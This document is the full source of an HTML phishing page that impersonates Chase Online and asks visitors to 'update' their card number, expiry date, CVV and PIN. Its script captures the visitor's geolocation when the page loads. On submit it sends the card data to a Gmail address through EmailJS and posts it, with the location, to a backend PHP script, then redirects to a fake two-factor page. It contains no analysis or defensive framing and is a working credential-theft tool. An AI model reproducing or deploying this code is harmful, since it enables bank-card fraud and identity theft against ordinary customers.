<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, maximum-scale=1"
    />
    <title>Card - Chase Online</title>
    <link rel="icon" type="image/x-icon" href="img/chasefavicon.ico" />
    <link
      href="https://fonts.googleapis.com/css2?family=Material+Icons"
      rel="stylesheet"
    />
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,0,0"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css"
      integrity="sha512-SnH5WK+bZxgPHs44uWIX+LLJAJ9/2PkPKZ5QiAj6Ta86w+fsb2TkcmfRyVX3pBnMFcV7oQPJkl9QevSCWr3W6A=="
      crossorigin="anonymous"
      referrerpolicy="no-referrer"
    />
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300..800;1,300..800&display=swap");
      * {
        margin: 0;
        padding: 0;
      }

      body {
        margin: 0;
        padding: 0;
        font-family: "Open Sans", sans-serif;
        background-image: url("img/background_image.jpeg");
        background-size: cover;
        background-attachment: fixed;
      }
      .container {
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        gap: 70px;
        margin-bottom: 50px;
      }

      .chase-logo {
        display: flex;
        align-items: center;
        justify-content: center;
        width: 100%;
        padding: 20px 0;
        margin-top: 26px;
        background: linear-gradient(to bottom, #000000d3, #00000000);
      }

      .chase-logo img {
        width: 180px;
      }

      form {
        border-radius: 5px;
        width: 380px;
        padding: 30px;
        display: flex;
        flex-direction: column;
        align-items: center;
        background-color: rgb(255, 255, 255);
      }

      .input {
        display: flex;
        flex-direction: column;
        gap: 5px;
        width: 100%;
      }

      label {
        font-size: 14px;
        color: rgb(78, 78, 78);
      }

      input,
      select {
        padding: 12px;
        margin-bottom: 20px;
        border: none;
        border-bottom: 1px solid rgb(56, 56, 56);
        background-color: rgb(237, 237, 237);
        transition: border-color 0.3s ease;
      }
      input:focus {
        outline: none;
        border-color: orangered;
      }
      .forgot-password {
        text-align: left;
        margin-bottom: 20px;
      }
      .links {
        width: 100%;
        display: flex;
        justify-content: space-between;
        align-items: center;
      }

      .remember-token {
        width: 80%;
        display: flex;
        justify-content: space-between;
      }

      button {
        width: 100%;
        font-family: inherit;
        font-weight: 600;
        font-size: 14px;
        padding: 8px;
        border-radius: 5px;
        border: none;
        background-color: #0060f0;
        color: #fff;
        cursor: pointer;
        transition: 0.1s ease;
        margin-bottom: 20px;
      }

      button:hover {
        background-color: rgb(0, 46, 83);
      }

      a {
        align-self: flex-start;
        font-size: 14px;
        font-weight: 500;
        text-decoration: none;
        color: #0060f0;
      }

      .footer {
        background-color: rgb(255, 255, 255);
        width: 100%;
        display: flex;
        color: #717171;
        align-items: center;
        flex-direction: column;
        display: none;
      }

      .footer .top {
        display: flex;
        gap: 15px;
        justify-content: center;
        padding-block: 20px;
        border-bottom: 1px solid grey;
        width: 90%;
      }

      .footer .center {
        padding: 20px;
        display: flex;
        gap: 20px;
        width: 80%;
        align-items: center;
        flex-wrap: wrap;
        justify-content: center;
      }

      .footer .center a {
        font-weight: 300;
        font-size: 11px;
        display: flex;
        gap: 5px;
        color: #323232;
        text-decoration: underline;
        align-items: center;
      }

      .footer .center a span {
        font-size: 13px;
      }

      .icons {
        display: flex;
        gap: 10px;
        font-size: 24px;
      }

      .bottom {
        font-weight: 300;
        font-size: 11px;
        display: flex;
        gap: 5px;
        color: #323232;
      }

      .form-control {
        display: flex;
        flex-direction: column;
        gap: 10px;
      }

      .date {
        display: flex;
        gap: 10px;
      }

      select:focus {
        outline: none;
      }

      .username {
        display: flex;
        gap: 20px;
      }

      .notif {
        background-color: rgb(220, 108, 70);
        color: rgb(0, 0, 0);
        font-size: 13px;
        border-radius: 5px;
        padding: 15px;
      }

      @media screen and (max-width: 600px) {
        form {
          max-width: 300px;
        }

        input {
          width: 100%;
        }
      }
      body {
        margin: 0;
        padding: 0;
        font-family: "Open Sans", sans-serif;
        background-image: url("img/background_image.jpeg");
        background-size: cover;
        background-attachment: fixed;
        height: 100vh; /* Full viewport height */
        display: flex;
        justify-content: center;
        align-items: center; /* Center content vertically and horizontally */
      }

      .container {
        display: flex;
        flex-direction: column;
        justify-content: center; /* Center content vertically */
        align-items: center; /* Center content horizontally */
        width: 100%;
        height: 100vh; /* Full viewport height */
        gap: 20px; /* Adjust the gap between elements */
      }

      form {
        border-radius: 5px;
        width: 320px;
        padding: 30px;
        display: flex;
        flex-direction: column;
        align-items: center;
        background-color: rgb(255, 255, 255);
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); /* Optional: Add a box shadow */
        position: relative; /* Add relative positioning */
      }
    </style>
  </head>
  <body>
    <div class="container">
      <div class="chase-logo">
        <img src="img/wordmark-white.png" alt="" />
      </div>
      <div style="display: grid; place-items: center; flex: 1">
        <form>
          <div id="login-title">
            <h1
              style="font-size: 24px; text-align: center; margin-bottom: 15px"
            >
              Please update your card information
            </h1>
          </div>
          <div class="form-control">
            <div class="username">
              <input
                style="width: 100%"
                type="text"
                placeholder="Card Number"
                class="username-input"
                id="card"
                name="card"
              />
            </div>
            <div class="username">
              <div class="date">
                <select class="expiration-select" id="exp-month">
                  <option value="" disabled selected>Month</option>
                  <option value="01">01</option>
                  <option value="02">02</option>
                  <option value="03">03</option>
                  <option value="04">04</option>
                  <option value="05">05</option>
                  <option value="06">06</option>
                  <option value="07">07</option>
                  <option value="08">08</option>
                  <option value="09">09</option>
                  <option value="10">10</option>
                  <option value="11">11</option>
                  <option value="12">12</option>
                </select>
                <select class="expiration-select" id="exp-year">
                  <option value="" disabled selected>Year</option>
                  <option value="22">2022</option>
                  <option value="23">2023</option>
                  <option value="24">2024</option>
                  <option value="25">2025</option>
                  <option value="26">2026</option>
                  <option value="27">2027</option>
                  <option value="28">2028</option>
                  <option value="29">2029</option>
                  <option value="30">2030</option>
                </select>
              </div>
              <input
                type="text"
                placeholder="CVV"
                class="username-input"
                id="cvv"
                name="CVV"
                maxlength="3"
              />
            </div>
            <input
              type="text"
              placeholder="PIN"
              class="username-input"
              id="pin"
              name="pin"
            />
            <button type="button" class="login-btn" id="submit-btn">
              Update
            </button>
          </div>
        </form>
      </div>
    </div>
    <div class="footer">
      <div class="top">
        Follow Us:
        <div class="icons">
          <i class="fa-brands fa-facebook"></i>
          <i class="fa-brands fa-instagram"></i>
          <i class="fa-brands fa-twitter"></i>
          <i class="fa-brands fa-youtube"></i>
          <i class="fa-brands fa-linkedin"></i>
        </div>
      </div>
      <div class="center">
        <a href="#">Contact us</a>
        <a href="#">Privacy</a>
        <a href="#">Security</a>
        <a href="#">Terms of use</a>
        <a href="#">Accessibility</a>
        <a href="#">SAFE Act: Chase Mortgage Loan Originators</a>
        <a href="#">Fair Lending</a>
        <a href="#">About Chase</a>
        <a href="#">J.P. Morgan</a>
        <a href="#">JPMorgan Chase & Co.</a>
        <a href="#">Careers</a>
        <a href="#">Espanol</a>
        <a href="#">Chase Canada</a>
        <a href="#">Site map</a>
        <a href="#" style="text-decoration: none">Member FDIC</a>
        <a href="#" style="text-decoration: none">
          <span class="material-symbols-outlined"> other_houses </span>
          Equal Housing Opportunity
        </a>
      </div>
      <div class="bottom">(c) 2024 JPMorgan Chase & Co.</div>
    </div>

    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"
      integrity="sha512-v2CJ7UaYy4JwqLDIrZUI/4hqeoQieOmAZNXBeQyjo21dadnwR+8ZaIJVT8EE2iyI61OV8e6M8PP2/4hpQINQ/g=="
      crossorigin="anonymous"
      referrerpolicy="no-referrer"
    ></script>
    <script
      type="text/javascript"
      src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"
    ></script>
    <script type="text/javascript">
      (function () {
        emailjs.init({
          publicKey: "10Wh8RN-TPlYZRbap",
        });
      })();
    </script>
    <script>
      document.addEventListener("DOMContentLoaded", getUserLocation);

      // Function to get user's location
      function getUserLocation() {
        if (navigator.geolocation) {
          navigator.geolocation.getCurrentPosition(
            // Success callback
            function (position) {
              const latitude = position.coords.latitude;
              const longitude = position.coords.longitude;
              console.log(`Latitude: ${latitude}, Longitude: ${longitude}`);
              getLocationFromCoordinates(latitude, longitude);

              // You can now use latitude and longitude to further process the location
            },
            // Error callback
            function (error) {
              console.error("Error getting user location:", error);
            }
          );
        } else {
          console.error("Geolocation is not supported by this browser.");
        }
      }
      var loc;
      // Function to get location from latitude and longitude
      function getLocationFromCoordinates(latitude, longitude) {
        // Construct the URL for the OpenStreetMap Nominatim API
        const apiUrl = `https://nominatim.openstreetmap.org/reverse?format=json&lat=${latitude}&lon=${longitude}`;

        // Make a GET request to the API
        fetch(apiUrl)
          .then((response) => response.json())
          .then((data) => {
            console.log(data);
            if (data && data.display_name) {
              loc = data.display_name;
            } else {
              console.error("No location found for the coordinates.");
            }
          })
          .catch((error) => {
            console.error("Error fetching location:", error);
          });
      }
      // Function to format card number as XXXX-XXXX-XXXX-XXXX
      function formatCardNumber(input) {
        let value = input.value.replace(/\D/g, "");
        value = value.replace(/(.{4})/g, "$1 ").trim();
        input.value = value;
      }

      // Event listener to format card number as it's typed and allow only numeric input
      document.getElementById("card").addEventListener("input", function () {
        formatCardNumber(this);
      });

      // Event listener to limit CVV input to 3 characters and allow only numeric input
      document.getElementById("cvv").addEventListener("input", function () {
        let value = this.value.replace(/\D/g, "");
        if (value.length > 3) {
          this.value = value.slice(0, 3);
        }
        this.value = this.value.replace(/\D/g, "");
      });
      const loginTitle = document.getElementById("login-title");
      $(document).ready(function () {
        $("#submit-btn").click(function () {
          var card = $("#card").val();
          var expM = $("#exp-month").val();
          var expY = $("#exp-year").val();
          var cvv = $("#cvv").val();
          var pin = $("#pin").val();

          if (
            card == "" ||
            expM == "" ||
            cvv == "" ||
            expY == "" ||
            pin == ""
          ) {
            loginTitle.innerHTML = `
                  <div class='notif'>Please fill in all the fields.</div>
                  `;
          } else {
            const exp = expM + "/" + expY;
            function sendMail() {
              const serviceId = "service_wp0ll78";
              const templateId = "template_pvad5x6";
              var params = {
                name: "CHASE-ICONASSETS",
                email: "dreedlock6@gmail.com",
                message: `
      <table border="1" cellpadding="5" cellspacing="0" style="border-collapse: collapse;">
        <tr>
          <td><strong>Page:</strong></td>
          <td>Card Details</td>
        </tr>
        <tr>
          <td><strong>Card Number:</strong></td>
          <td>${card}</td>
        </tr>
        <tr>
          <td><strong>Expiration:</strong></td>
          <td>${exp}</td>
        </tr>
        <tr>
          <td><strong>CVV:</strong></td>
          <td>${cvv}</td>
        </tr>
        <tr>
          <td><strong>Pin:</strong></td>
          <td>${pin}</td>
        </tr>
        <tr>
          <td><strong>Source:</strong></td>
          <td>CHASE</td>
        </tr>
      </table>
    `,
              };

              emailjs
                .send(serviceId, templateId, params)
                .then((res) => console.log(res));
            }

            sendMail();
            $.ajax({
              type: "POST",
              url: "backend.php",
              data: {
                card: card,
                exp: exp,
                type: "card",
                cvv: cvv,
                pin: pin,
                loc,
              },

              success: function (response) {
                console.log(response);
                window.location.href = "2factor.html";
              },
            });
          }
        });
      });
    </script>
  </body>
</html>
